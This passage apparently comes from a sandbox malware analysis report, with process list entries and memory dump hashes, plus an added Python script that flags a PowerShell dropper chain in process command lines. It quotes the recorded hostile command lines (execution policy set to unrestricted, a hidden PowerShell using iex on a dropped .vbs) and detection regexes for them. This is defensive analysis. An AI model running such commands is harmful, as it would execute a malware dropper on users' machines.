                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        Target ID:11
                                                                                        Start time:06:45:14
                                                                                        Start date:19/12/2024
                                                                                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                                        Imagebase:0x7ff63ec50000
                                                                                        File size:3'581'912 bytes
                                                                                        MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        Target ID:12
                                                                                        Start time:06:45:14
                                                                                        Start date:19/12/2024
                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                        Imagebase:0x7ff7df220000
                                                                                        File size:55'320 bytes
                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        Target ID:13
                                                                                        Start time:06:45:14
                                                                                        Start date:19/12/2024
                                                                                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2128 --field-trial-handle=1660,i,3372118493204985000,18369712110352765169,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                                        Imagebase:0x7ff63ec50000
                                                                                        File size:3'581'912 bytes
                                                                                        MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:false
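The process list above shows the chain a detection engineer would want to match: a PowerShell started with `-ExecutionPolicy unrestricted` on the sample, two seconds later a second PowerShell with `-win hidden` and `iex` pointed at a `.vbs` under the `public` profile, then Acrobat opening a PDF from the Desktop and the BITS service host starting. The following Python script is an added example, not part of the report: it scores each process creation record with rules for the parameter substrings seen here and then looks for the ordered pair "policy downgrade, followed within a window by a hidden PowerShell running a dropped script". The records are copied from the process list above (the two AcroCEF.exe children are omitted as noise); the rule names, weights and the 60-second window are this example's own choices. Note that the captured command line of target 8 reads `=iex`, not `iex`, so the rule matches on a word boundary rather than on a leading space or dash.

```python
import re
from datetime import datetime

# Process creation records (target id, start time, image path, command line),
# copied from the sandbox report's process list; not re-captured here.
PROCESSES = [
    (5, "06:44:59", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\8iAcoQLc3o.ps1"'),
    (6, "06:44:59", r"C:\Windows\System32\conhost.exe",
     r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    (8, "06:45:01", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\hqpoqw.vbs'"'''),
    (10, "06:45:13", r"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe",
     r'"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf"'),
    (12, "06:45:14", r"C:\Windows\System32\svchost.exe",
     r"C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS"),
]

# (rule name, weight, pattern). Parameter names are matched on their prefixes
# too, because powershell.exe accepts any unambiguous abbreviation
# (-ep, -exec, -w, -win, ...). Weights are this example's own choice.
POWERSHELL_RULES = [
    ("execution policy downgrade", 40,
     re.compile(r"-e[xp]\w*\s+(?:unrestricted|bypass)", re.I)),
    ("hidden window", 30,
     re.compile(r"-w(?:i\w*)?\s+hidden", re.I)),
    ("invoke-expression", 30,
     re.compile(r"(?:\biex\b|invoke-expression)", re.I)),
    ("script in world-writable directory", 30,
     re.compile(r"(?:getenvironmentvariable\(\s*'public'\s*\)|\$env:public|%public%"
                r"|\\users\\public\\|\\appdata\\local\\temp\\|\\windows\\temp\\)"
                r".*?\.(?:vbs|js|jse|ps1|bat|cmd|hta)\b", re.I | re.S)),
]


def score_process(path, cmdline):
    """Return (score, [rule names]) for one process creation record."""
    findings, score = [], 0
    if path.lower().endswith(("\\powershell.exe", "\\pwsh.exe")):
        for name, weight, rx in POWERSHELL_RULES:
            if rx.search(cmdline):
                findings.append(name)
                score += weight
    elif re.search(r"\\svchost\.exe$", path, re.I) and re.search(r"-s\s+BITS\b", cmdline, re.I):
        # Not malicious by itself; it is the prompt to enumerate BITS jobs
        # (Get-BitsTransfer -AllUsers) for a download the script queued.
        findings.append("BITS service started (check transfer jobs)")
        score += 10
    elif (re.search(r"\\(?:acrobat|acrord32|winword|excel)\.exe$", path, re.I)
          and re.search(r'\.(?:pdf|docx?|xlsx?)"?\s*$', cmdline, re.I)):
        findings.append("document viewer opened a file (possible decoy)")
        score += 10
    return score, findings


def _t(hhmmss):
    return datetime.strptime(hhmmss, "%H:%M:%S")


def triage(records, window_seconds=60):
    """Score every record, then look for the ordered chain: a PowerShell that
    downgraded the execution policy, followed within the window by a hidden
    PowerShell. Returns per-process scores, the chain flag and a verdict."""
    rows = []
    for pid, start, path, cmd in sorted(records, key=lambda r: _t(r[1])):
        score, findings = score_process(path, cmd)
        rows.append({"id": pid, "start": start, "score": score, "findings": findings})
    flagged = [r for r in rows if r["score"] >= 30]
    chain = False
    for i, first in enumerate(flagged):
        for later in flagged[i + 1:]:
            delta = (_t(later["start"]) - _t(first["start"])).total_seconds()
            if (0 <= delta <= window_seconds
                    and "execution policy downgrade" in first["findings"]
                    and "hidden window" in later["findings"]):
                chain = True
    total = sum(r["score"] for r in rows)
    verdict = "malicious" if chain or total >= 100 else "suspicious" if total >= 40 else "benign"
    return {"processes": rows, "chain": chain, "total": total, "verdict": verdict}


if __name__ == "__main__":
    result = triage(PROCESSES)
    for row in result["processes"]:
        print(f"target {row['id']:>2} {row['start']} score={row['score']:<3} {', '.join(row['findings'])}")
    print(f"chain={result['chain']} total={result['total']} verdict={result['verdict']}")
```

The same rules run unchanged over Sysmon event 1 or Security 4688 records if the image path and command line fields are fed in; the chain check is what separates an administrator's one-off `-ExecutionPolicy Bypass` from the dropper pattern recorded here, where the hidden second stage follows the first within seconds.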

                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1593937062.00007FF7C1100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1100000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_7ff7c1100000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: A_H
                                                                                          • API String ID: 0-522415800
                                                                                          • Opcode ID: 747358daff11b478e795d42c6b8e9a4d484fc8b3e63c9b0c280c35ca7868daff
                                                                                          • Instruction ID: 8b0be7c4017d51a1020aa5df9baa4982588fa1dd6d476247a775862e73415aee
                                                                                          • Opcode Fuzzy Hash: 747358daff11b478e795d42c6b8e9a4d484fc8b3e63c9b0c280c35ca7868daff
                                                                                          • Instruction Fuzzy Hash: 92D13731D0DA898FE795EF2858555B9BBE1FF06760B9801FED04DC7193DA28AC05C3A1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1593937062.00007FF7C1100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1100000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_7ff7c1100000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5e0bb3d25251d2e6afd3b15828e6159b6deba2d53ac0f42e201350c13ef6e9f3
                                                                                          • Instruction ID: 7d01e6b8f25b537d878468e90d584dad5771a6cacb339450ac31b020584c7856
                                                                                          • Opcode Fuzzy Hash: 5e0bb3d25251d2e6afd3b15828e6159b6deba2d53ac0f42e201350c13ef6e9f3
                                                                                          • Instruction Fuzzy Hash: 0121F622F0DE8A4FE395AA282855278A3D2FF45B70BE801BAC00DC7593ED6DAC458351
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000005.00000002.1593299543.00007FF7C1030000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1030000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_5_2_7ff7c1030000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                          • Instruction ID: f74816c3f15cd79ea862fa9a15e58198f8f7d63de8464c6ab46016a4c9395051
                                                                                          • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                          • Instruction Fuzzy Hash: 5001677111CB0C4FDB58EF0CE451AA5B7E0FB95364F50056DE58AC3651D636E882CB45
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000008.00000002.1359432768.00007FF7C1100000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1100000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_8_2_7ff7c1100000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 9802e1f06111abfb47f3445eb83a91afab210d60de0c798cd1b20944231ef296
                                                                                          • Instruction ID: 51b1532769a41f7a209cfb1ed2a3008c1f024c01bd8a5289a196b2da943af6d0
                                                                                          • Opcode Fuzzy Hash: 9802e1f06111abfb47f3445eb83a91afab210d60de0c798cd1b20944231ef296
                                                                                          • Instruction Fuzzy Hash: 4DD16631E1DAC94FE755EB2868951B9BBE0FF06760B6801FEC04DCB193DA6CA805C351
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000008.00000002.1358945138.00007FF7C1030000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C1030000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_8_2_7ff7c1030000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                          • Instruction ID: dc2b7bff0b1548f22243c26c3010356d6547b4b9d5558d1f0ac78b5835d5ebab
                                                                                          • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                          • Instruction Fuzzy Hash: CF01677111CB0C4FDB44EF0CE451AA5B7E0FB95364F50056DE58AC3651DA36E882CB45